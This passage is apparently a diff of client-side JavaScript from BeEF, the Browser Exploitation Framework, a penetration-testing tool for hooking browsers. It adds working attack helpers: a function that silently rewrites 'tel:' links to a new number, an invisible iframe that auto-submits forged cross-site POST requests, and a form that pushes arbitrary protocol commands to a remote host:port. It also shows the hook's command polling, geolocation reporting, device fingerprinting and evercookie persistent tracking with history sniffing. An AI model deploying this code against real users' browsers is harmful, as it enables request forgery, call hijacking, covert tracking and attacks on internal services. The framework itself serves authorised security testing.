      * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
 	 * @param: {String} old_protocol: the old link protocol to be rewritten
@@ -194,6 +321,31 @@ beef.dom = {
 		return count;
 	},
 
+	/**
+	 * Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
+	 * @param: {String} new_number: the new link telephone number to be written
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteTelLinks: function(new_number, selector) {
+
+		var count = 0;
+		var re = new RegExp("tel:/?/?.*", "gi");
+		var sel = (selector == null) ? 'a' : selector;
+
+		$j(sel).each(function() {
+			if ($j(this).attr('href') != null) {
+				var url = $j(this).attr('href');
+				if (url.match(re)) {
+					$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
+					count++;
+				}
+			}
+		});
+
+		return count;
+	},
+
     /**
      *  Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
      * @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
@@ -240,7 +392,7 @@ beef.dom = {
             }
             content += "</object>";
         }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
 
             if (codebase != null) {
                 content = "" +
@@ -259,24 +411,25 @@ beef.dom = {
             }
             content += "</applet>";
         }
-        if (beef.browser.isFF()) {
-            if (codebase != null) {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            } else {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            }
-
-            if (params != null) {
-                content += beef.dom.parseAppletParams(params);
-            }
-            content += "</embed>";
-        }
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
+//        if (beef.browser.isFF()) {
+//            if (codebase != null) {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            } else {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            }
+//
+//            if (params != null) {
+//                content += beef.dom.parseAppletParams(params);
+//            }
+//            content += "</embed>";
+//        }
         $j('body').append(content);
     },
 
@@ -286,10 +439,61 @@ beef.dom = {
      */
     detachApplet: function(id) {
         $j('#' + id + '').detach();
+    },
+
+    /**
+     * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
+     * @params: {String} action: the form action attribute, where the request will be sent.
+     * @params: {String} method: HTTP method, usually POST.
+     * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
+     *         example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
+     */
+    createIframeXsrfForm: function(action, method, inputs){
+        var iframeXsrf = beef.dom.createInvisibleIframe();
+
+        var formXsrf = document.createElement('form');
+        formXsrf.setAttribute('action', action);
+        formXsrf.setAttribute('method', method);
+
+        var input = null;
+        for (i in inputs){
+            var attributes = inputs[i];
+            input = document.createElement('input');
+                for(key in attributes){
+                    input.setAttribute(key, attributes[key]);
+                }
+            formXsrf.appendChild(input);
+        }
+        iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
+        formXsrf.submit();
+
+        return iframeXsrf;
+    },
+
+    /**
+     * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
+     * @params: {String} rhost: remote host ip/domain
+     * @params: {String} rport: remote port
+     * @params: {String} commands: protocol commands to be executed by the remote host:port service
+     */
+    createIframeIpecForm: function(rhost, rport, commands){
+        var iframeIpec = beef.dom.createInvisibleIframe();
+
+        var formIpec = document.createElement('form');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('method',  'POST');
+        formIpec.setAttribute('enctype', 'multipart/form-data');
+
+        input = document.createElement('textarea');
+        input.setAttribute('name', Math.random().toString(36).substring(5));
+        input.value = commands;
+        formIpec.appendChild(input);
+        iframeIpec.contentWindow.document.body.appendChild(formIpec);
+        formIpec.submit();
+
+        return iframeIpec;
     }
 
-
-	
 };
 
 beef.regCmp('beef.dom');

core/main/client/encode/base64.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
 
 beef.encode = {};
@@ -156,6 +147,6 @@ beef.encode.base64 = {
         return string;
     }
 
-}
+};
 
 beef.regCmp('beef.encode.base64');

core/main/client/encode/json.js

@@ -1,26 +1,23 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
 
 beef.encode.json = {
 	
 	stringify: function(o) {
-        if (typeof(JSON) == 'object' && JSON.stringify)
-            return JSON.stringify(o);
-        
+        if (typeof(JSON) == 'object' && JSON.stringify) {
+            // Error on stringifying cylcic structures caused polling to die
+            try {
+                s = JSON.stringify(o);    
+            } catch(error) {
+                // TODO log error / handle cyclic structures? 
+            }
+            return s;
+        }
         var type = typeof(o);
     
         if (o === null)
@@ -126,9 +123,9 @@ beef.encode.json = {
         '"' : '\\"',
         '\\': '\\\\'
     }
-}
+};
 
-$j.toJSON = function(o) {return beef.encode.json.stringify(o);}
-$j.quoteString = function(o) {return beef.encode.json.quoteString(o);}
+$j.toJSON = function(o) {return beef.encode.json.stringify(o);};
+$j.quoteString = function(o) {return beef.encode.json.quoteString(o);};
 
 beef.regCmp('beef.encode.json');

core/main/client/geolocation.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.geolocation
  *
@@ -41,14 +32,14 @@ beef.geolocation = {
 
         $j.ajax({
             error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                 beef.net.send(command_url, command_id, "latitude=" + latitude
                              + "&longitude=" + longitude
                              + "&osm=UNAVAILABLE"
                              + "&geoLocEnabled=True");
                 },
             success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                 var jsonResp = $j.parseJSON(data);
 
                 beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -73,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
         navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
         		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                 beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:

core/main/client/hardware.js

@@ -0,0 +1,129 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.hardware = {
+
+	ua: navigator.userAgent,
+
+	cpuType: function() {
+		// IE
+		if (typeof navigator.cpuClass != 'undefined') {
+			cpu = navigator.cpuClass;
+			if (cpu == "x86")   return "32-bit";
+			if (cpu == "68K")   return "Motorola 68K";
+			if (cpu == "PPC")   return "Motorola PPC";
+			if (cpu == "Alpha") return "Digital";
+			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
+			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
+		// Firefox
+        } else if (typeof navigator.oscpu != 'undefined') {
+			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
+		}
+		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
+		return "32-bit";
+	},
+
+	isTouchEnabled: function() {
+		if ('ontouchstart' in document) return true;
+		return false;
+	},
+
+	isVirtualMachine: function() {
+		if (screen.width % 2 || screen.height % 2) return true;
+		return false;
+	},
+
+	isLaptop: function() {
+		// Most common laptop screen resolution
+		if (screen.width == 1366 && screen.height == 768) return true;
+		// Netbooks
+		if (screen.width == 1024 && screen.height == 600) return true;
+		return false;
+	},
+
+	isNokia: function() {
+		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+	},
+
+	isZune: function() {
+		return (this.ua.match('ZuneWP7')) ? true : false;
+	},
+
+	isHtc: function() {
+		return (this.ua.match('HTC')) ? true : false;
+	},
+
+	isEricsson: function() {
+		return (this.ua.match('Ericsson')) ? true : false;
+	},
+
+	isMotorola: function() {
+		return (this.ua.match('Motorola')) ? true : false;
+	},
+
+	isGoogle: function() {
+		return (this.ua.match('Nexus One')) ? true : false;
+	},
+
+        /**
+         * Returns true if the browser is on a Mobile Phone
+         * @return: {Boolean} true or false
+         *
+         * @example: if(beef.hardware.isMobilePhone()) { ... }
+         **/
+        isMobilePhone: function() {
+            return DetectMobileQuick();
+        },
+
+	getName: function() {
+                var ua = navigator.userAgent.toLowerCase();
+                if(DetectIphone())              { return "iPhone"};
+                if(DetectIpod())                { return "iPod Touch"};
+                if(DetectIpad())                { return "iPad"};
+		if (this.isHtc())               { return 'HTC'};
+		if (this.isMotorola())          { return 'Motorola'};
+		if (this.isZune())              { return 'Zune'};
+		if (this.isGoogle())            { return 'Google Nexus One'};
+		if (this.isEricsson())          { return 'Ericsson'};
+                if(DetectAndroidPhone())        { return "Android Phone"};
+                if(DetectAndroidTablet())       { return "Android Tablet"};
+                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+		if (this.isNokia())             { return 'Nokia'};
+                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+                if(DetectWindowsMobile())       { return "Windows Mobile"};
+                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+                if(DetectBlackBerry())          { return "BlackBerry"};
+                if(DetectPalmOS())              { return "Palm OS"};
+                if(DetectPalmWebOS())           { return "Palm Web OS"};
+                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+                if(DetectArchos())              { return "Archos"}
+                if(DetectBrewDevice())          { return "Brew"};
+                if(DetectDangerHiptop())        { return "Danger Hiptop"};
+                if(DetectMaemoTablet())         { return "Maemo Tablet"};
+                if(DetectSonyMylo())            { return "Sony Mylo"};
+                if(DetectAmazonSilk())          { return "Kindle Fire"};
+                if(DetectKindle())              { return "Kindle"};
+                if(DetectSonyPlaystation())                 { return "Playstation"};
+                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+                if(DetectXbox())                            { return "Xbox"};
+				if(this.isLaptop())							{ return "Laptop"};
+                if(this.isVirtualMachine())                 { return "Virtual Machine"};
+
+		return 'Unknown';
+	}
+};
+
+beef.regCmp('beef.hardware');

core/main/client/init.js

@@ -1,69 +1,81 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
- 
-// if beef.pageIsLoaded is true, then this JS has been loaded >1 times 
-// and will have a new session id. The new session id will need to know
-// the brwoser details. So sendback the browser details again.
 
-BEEFHOOK=beef.session.get_hook_session_id()
+/**
+ * @literal object: beef.init
+ * Contains the beef_init() method which starts the BeEF client-side
+ * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
+ *
+ * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
+ * and will have a new session id. The new session id will need to know
+ * the brwoser details. So sendback the browser details again.
+ */
 
-if( beef.pageIsLoaded ) {
-  beef.net.browser_details();	
+beef.session.get_hook_session_id();
+
+if (beef.pageIsLoaded) {
+    beef.net.browser_details();
 }
 
-window.onload = function() {
-	beef_init();
-}
+window.onload = function () {
+    beef_init();
+};
 
-window.onpopstate = function(event) {
-	if(beef.onpopstate.length > 0) {
-			event.preventDefault;
-			for(var i=0;i<beef.onpopstate.length;i++){
-				var callback = beef.onpopstate[i];
-				try{
-					callback(event);
-				}catch(e){
-					console.log("window.onpopstate - couldn't execute callback: " + e.message);
-				}
-			return false;
-		}
-	}
-}
+window.onpopstate = function (event) {
+    if (beef.onpopstate.length > 0) {
+        event.preventDefault;
+        for (var i = 0; i < beef.onpopstate.length; i++) {
+            var callback = beef.onpopstate[i];
+            try {
+                callback(event);
+            } catch (e) {
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
+            }
+            return false;
+        }
+    }
+};
 
-window.onclose = function(event) {
-	if(beef.onclose.length > 0) {
-			event.preventDefault;
-			for(var i=0;i<beef.onclose.length;i++){
-				var callback = beef.onclose[i];
-				try{
-					callback(event);
-				}catch(e){
-					console.log("window.onclose - couldn't execute callback: " + e.message);
-				}
-			return false;
-		}
-	}
-}
+window.onclose = function (event) {
+    if (beef.onclose.length > 0) {
+        event.preventDefault;
+        for (var i = 0; i < beef.onclose.length; i++) {
+            var callback = beef.onclose[i];
+            try {
+                callback(event);
+            } catch (e) {
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
+            }
+            return false;
+        }
+    }
+};
 
+/**
+ * Starts the polling mechanism, and initialize various components:
+ *  - browser details (see browser.js) are sent back to the "/init" handler
+ *  - the polling starts (checks for new commands, and execute them)
+ *  - the logger component is initialized (see logger.js)
+ *  - the Autorun Engine is initialized (see are.js)
+ */
 function beef_init() {
-  if (!beef.pageIsLoaded) {
-    beef.pageIsLoaded = true;
-	beef.net.browser_details()
-    beef.updater.execute_commands();
-    beef.updater.check();
-    beef.logger.start();
-  }
+    if (!beef.pageIsLoaded) {
+        beef.pageIsLoaded = true;
+        if (beef.browser.hasWebSocket() && typeof beef.websocket != 'undefined') {
+            beef.websocket.start();
+            beef.net.browser_details();
+            beef.updater.execute_commands();
+            beef.logger.start();
+            beef.are.init();
+        }else {
+            beef.net.browser_details();
+            beef.updater.execute_commands();
+            beef.updater.check();
+            beef.logger.start();
+            beef.are.init();
+        }
+    }
 }

core/main/client/lib/evercookie.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
  * evercookie 0.4 (10/13/2010) -- extremely persistent cookies
  *
@@ -158,14 +149,14 @@ this.get = function(name, cb, dont_reset)
 	$(document).ready(function() {
 		self._evercookie(name, cb, undefined, undefined, dont_reset);
 	});
-}
+};
 
 this.set = function(name, value)
 {
 	$(document).ready(function() {
 			self._evercookie(name, function() { }, value);
 	});
-}
+};
 
 this._evercookie = function(name, cb, value, i, dont_reset)
 {
@@ -273,7 +264,7 @@ this._evercookie = function(name, cb, value, i, dont_reset)
 				cb(candidate, tmpec);
 		}
 	}
-}
+};
 
 this.evercookie_window = function(name, value)
 {
@@ -283,7 +274,7 @@ this.evercookie_window = function(name, value)
 		else
 			return this.getFromStr(name, window.name);
 	} catch(e) { }
-}
+};
 
 this.evercookie_userdata = function(name, value)
 {
@@ -302,7 +293,7 @@ this.evercookie_userdata = function(name, value)
 			return elm.getAttribute(name);
 		}
 	} catch(e) { }
-}
+};
 
 this.evercookie_cache = function(name, value)
 {
@@ -335,7 +326,7 @@ this.evercookie_cache = function(name, value)
 			}
 		});
 	}
-}
+};
 
 this.evercookie_etag = function(name, value)
 {
@@ -368,7 +359,7 @@ this.evercookie_etag = function(name, value)
 			}
 		});
 	}
-}
+};
 
 this.evercookie_lso = function(name, value)
 {
@@ -390,7 +381,7 @@ this.evercookie_lso = function(name, value)
 	attributes.id        = "myswf";
 	attributes.name      = "myswf";
 	swfobject.embedSWF("evercookie.swf", "swfcontainer", "1", "1", "9.0.0", false, flashvars, params, attributes);
-}
+};
 
 this.evercookie_png = function(name, value)
 {
@@ -453,7 +444,7 @@ this.evercookie_png = function(name, value)
 			}	
 		}
 	}
-}
+};
 
 this.evercookie_local_storage = function(name, value)
 {
@@ -468,7 +459,7 @@ this.evercookie_local_storage = function(name, value)
 		}
 	}
 	catch (e) { }
-}
+};
 
 this.evercookie_database_storage = function(name, value)
 {
@@ -506,7 +497,7 @@ this.evercookie_database_storage = function(name, value)
 			}
 		}
 	} catch(e) { }
-}
+};
 
 this.evercookie_session_storage = function(name, value)
 {
@@ -520,7 +511,7 @@ this.evercookie_session_storage = function(name, value)
 				return sessionStorage.getItem(name);
 		}
 	} catch(e) { }
-}
+};
 
 this.evercookie_global_storage = function(name, value)
 {
@@ -536,7 +527,7 @@ this.evercookie_global_storage = function(name, value)
 				return eval("globalStorage[host]." + name);
 		} catch(e) { }
 	}
-}
+};
 this.evercookie_silverlight = function(name, value) {
     /*
      * Create silverlight embed
@@ -566,7 +557,7 @@ this.evercookie_silverlight = function(name, value) {
             '</a>' +
         '</object>';
         document.body.innerHTML+=html;
-}
+};
 
 // public method for encoding
 this.encode = function (input) {
@@ -600,7 +591,7 @@ this.encode = function (input) {
 	}
 
 	return output;
-}
+};
 
 // public method for decoding
 this.decode = function (input) {
@@ -636,7 +627,7 @@ this.decode = function (input) {
 
 	return output;
 
-}
+};
 
 // private method for UTF-8 encoding
 this._utf8_encode = function (string) {
@@ -663,7 +654,7 @@ this._utf8_encode = function (string) {
 	}
 
 	return utftext;
-}
+};
 
 // private method for UTF-8 decoding
 this._utf8_decode = function (utftext) {
@@ -694,7 +685,7 @@ this._utf8_decode = function (utftext) {
 	}
 
 	return string;
-}
+};
 
 // this is crazy but it's 4am in dublin and i thought this would be hilarious
 // blame the guinness
@@ -759,7 +750,7 @@ this.evercookie_history = function(name, value)
 			return this.decode(val);
 		}
 	}
-}
+};
 
 this.createElem = function(type, name, append)
 {
@@ -778,14 +769,14 @@ this.createElem = function(type, name, append)
 		document.body.appendChild(el);
 
 	return el;
-}
+};
 
 this.createIframe = function(url, name)
 {
 	var el = this.createElem('iframe', name, 1);
 	el.setAttribute('src', url);
 	return el;
-}
+};
 
 // wait for our swfobject to appear (swfobject.js to load)
 this.waitForSwf = function(i)
@@ -798,19 +789,24 @@ this.waitForSwf = function(i)
 	// wait for ~2 seconds for swfobject to appear
 	if (i < _ec_tests && typeof swfobject == 'undefined')
 		setTimeout(function() { waitForSwf(i) }, 300);
-}
+};
 
 this.evercookie_cookie = function(name, value)
 {
-	if (typeof(value) != "undefined")
-	{
-		// expire the cookie first
-		document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
-		document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
-	}
-	else
-		return this.getFromStr(name, document.cookie);
-}
+    try{
+        if (typeof(value) != "undefined")
+        {
+            // expire the cookie first
+            document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
+            document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
+        }
+        else
+            return this.getFromStr(name, document.cookie);
+    }catch(e){
+        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
+        // evercookie_userdata and evercookie_window will be used in this case.
+    }
+};
 
 // get value from param-like string (eg, "x=y&name=VALUE")
 this.getFromStr = function(name, text)
@@ -828,7 +824,7 @@ this.getFromStr = function(name, text)
 		if (c.indexOf(nameEQ) == 0)
 			return c.substring(nameEQ.length, c.length);
 	}
-}
+};
 
 this.getHost = function()
 {
@@ -836,7 +832,7 @@ this.getHost = function()
 	if (domain.indexOf('www.') == 0)
 		domain = domain.replace('www.', '');
 	return domain;
-}
+};
 
 this.toHex = function(str)
 {
@@ -852,7 +848,7 @@ this.toHex = function(str)
         r += h;
     }
     return r;
-}
+};
 
 this.fromHex = function(str)
 {
@@ -866,7 +862,7 @@ this.fromHex = function(str)
         e = s;
     }
     return r;
-}
+};
 
 /* 
  * css history knocker (determine what sites your visitors have been to)
@@ -901,7 +897,7 @@ this.hasVisited = function(url)
 		this._testURL("https://" + url, this.no_color) ||
 		this._testURL("http://www." + url, this.no_color) ||
 		this._testURL("https://www." + url, this.no_color);
-}
+};
 
 /* create our anchor tag */
 var _link = this.createElem('a', '_ec_rgb_link');
@@ -930,30 +926,28 @@ try {
 }
 
 /* if test_color, return -1 if we can't set a style */
-this._getRGB = function(u, test_color)
-{
-	if (test_color && created_style == 0)
-		return -1;
+this._getRGB = function (u, test_color) {
+    if (test_color && created_style == 0)
+        return -1;
 
-	/* create the new anchor tag with the appropriate URL information */
-	_link.href = u;
-	_link.innerHTML = u;
-	// not sure why, but the next two appendChilds always have to happen vs just once
-	document.body.appendChild(style);
-	document.body.appendChild(_link);
-	
-	/* add the link to the DOM and save the visible computed color */
-	var color;
-	if (document.defaultView)
-		color = document.defaultView.getComputedStyle(_link, null).getPropertyValue('color');
-	else
-		color = _link.currentStyle['color'];
+    /* create the new anchor tag with the appropriate URL information */
+    _link.href = u;
+    _link.innerHTML = u;
+    // not sure why, but the next two appendChilds always have to happen vs just once
+    document.body.appendChild(style);
+    document.body.appendChild(_link);
 
-	return color;
-}
+    /* add the link to the DOM and save the visible computed color */
+    var color;
+    if (document.defaultView)
+        color = document.defaultView.getComputedStyle(_link, null).getPropertyValue('color');
+    else
+        color = _link.currentStyle['color'];
 
-this._testURL = function(url, no_color)
-{
+    return color;
+};
+
+this._testURL = function(url, no_color){
 	var color = this._getRGB(url);
 
 	/* check to see if the link has been visited if the computed color is red */

core/main/client/lib/mdetect.js

@@ -0,0 +1,706 @@
+
+/* *******************************************
+// Copyright 2010-2012, Anthony Hand
+// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
+// LICENSE INFORMATION
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//        http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing,
+// software distributed under the License is distributed on an
+// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
+// either express or implied. See the License for the specific
+// language governing permissions and limitations under the License.
+// *******************************************
+*/
+
+var isIphone = false;
+var isAndroidPhone = false;
+var isTierTablet = false;
+var isTierIphone = false;
+var isTierRichCss = false;
+var isTierGenericMobile = false;
+
+var engineWebKit = "webkit";
+var deviceIphone = "iphone";
+var deviceIpod = "ipod";
+var deviceIpad = "ipad";
+var deviceMacPpc = "macintosh"; //Used for disambiguation
+
+var deviceAndroid = "android";
+var deviceGoogleTV = "googletv";
+var deviceXoom = "xoom"; //Motorola Xoom
+var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
+
+var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
+
+var deviceSymbian = "symbian";
+var deviceS60 = "series60";
+var deviceS70 = "series70";
+var deviceS80 = "series80";
+var deviceS90 = "series90";
+
+var deviceWinPhone7 = "windows phone os 7";
+var deviceWinMob = "windows ce";
+var deviceWindows = "windows";
+var deviceIeMob = "iemobile";
+var devicePpc = "ppc"; //Stands for PocketPC
+var enginePie = "wm5 pie";  //An old Windows Mobile
+
+var deviceBB = "blackberry";
+var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
+var deviceBBStorm = "blackberry95"; //Storm 1 and 2
+var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
+var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
+var deviceBBTour = "blackberry96"; //Tour
+var deviceBBCurve = "blackberry89"; //Curve 2
+var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
+var deviceBBTorch = "blackberry 98"; //Torch
+var deviceBBPlaybook = "playbook"; //PlayBook tablet
+
+var devicePalm = "palm";
+var deviceWebOS = "webos"; //For Palm's line of WebOS devices
+var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
+
+var engineBlazer = "blazer"; //Old Palm browser
+var engineXiino = "xiino";
+
+var deviceKindle = "kindle"; //Amazon Kindle, eInk one
+var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
+
+var vndwap = "vnd.wap";
+var wml = "wml";
+
+var deviceTablet = "tablet"; //Generic term for slate and tablet devices
+var deviceBrew = "brew";
+var deviceDanger = "danger";
+var deviceHiptop = "hiptop";
+var devicePlaystation = "playstation";
+var deviceNintendoDs = "nitro";
+var deviceNintendo = "nintendo";
+var deviceWii = "wii";
+var deviceXbox = "xbox";
+var deviceArchos = "archos";
+
+var engineOpera = "opera"; //Popular browser
+var engineNetfront = "netfront"; //Common embedded OS browser
+var engineUpBrowser = "up.browser"; //common on some phones
+var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
+var deviceMidp = "midp"; //a mobile Java technology
+var uplink = "up.link";
+var engineTelecaQ = 'teleca q'; //a modern feature phone browser
+
+var devicePda = "pda";
+var mini = "mini";  //Some mobile browsers put 'mini' in their names.
+var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
+var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
+
+var maemo = "maemo";
+var linux = "linux";
+var qtembedded = "qt embedded"; //for Sony Mylo and others
+var mylocom2 = "com2"; //for Sony Mylo also
+
+var manuSonyEricsson = "sonyericsson";
+var manuericsson = "ericsson";
+var manuSamsung1 = "sec-sgh";
+var manuSony = "sony";
+var manuHtc = "htc"; //Popular Android and WinMo manufacturer
+
+var svcDocomo = "docomo";
+var svcKddi = "kddi";
+var svcVodafone = "vodafone";
+
+var disUpdate = "update"; //pda vs. update
+
+var uagent = "";
+if (navigator && navigator.userAgent)
+    uagent = navigator.userAgent.toLowerCase();
+
+function DetectIphone()
+{
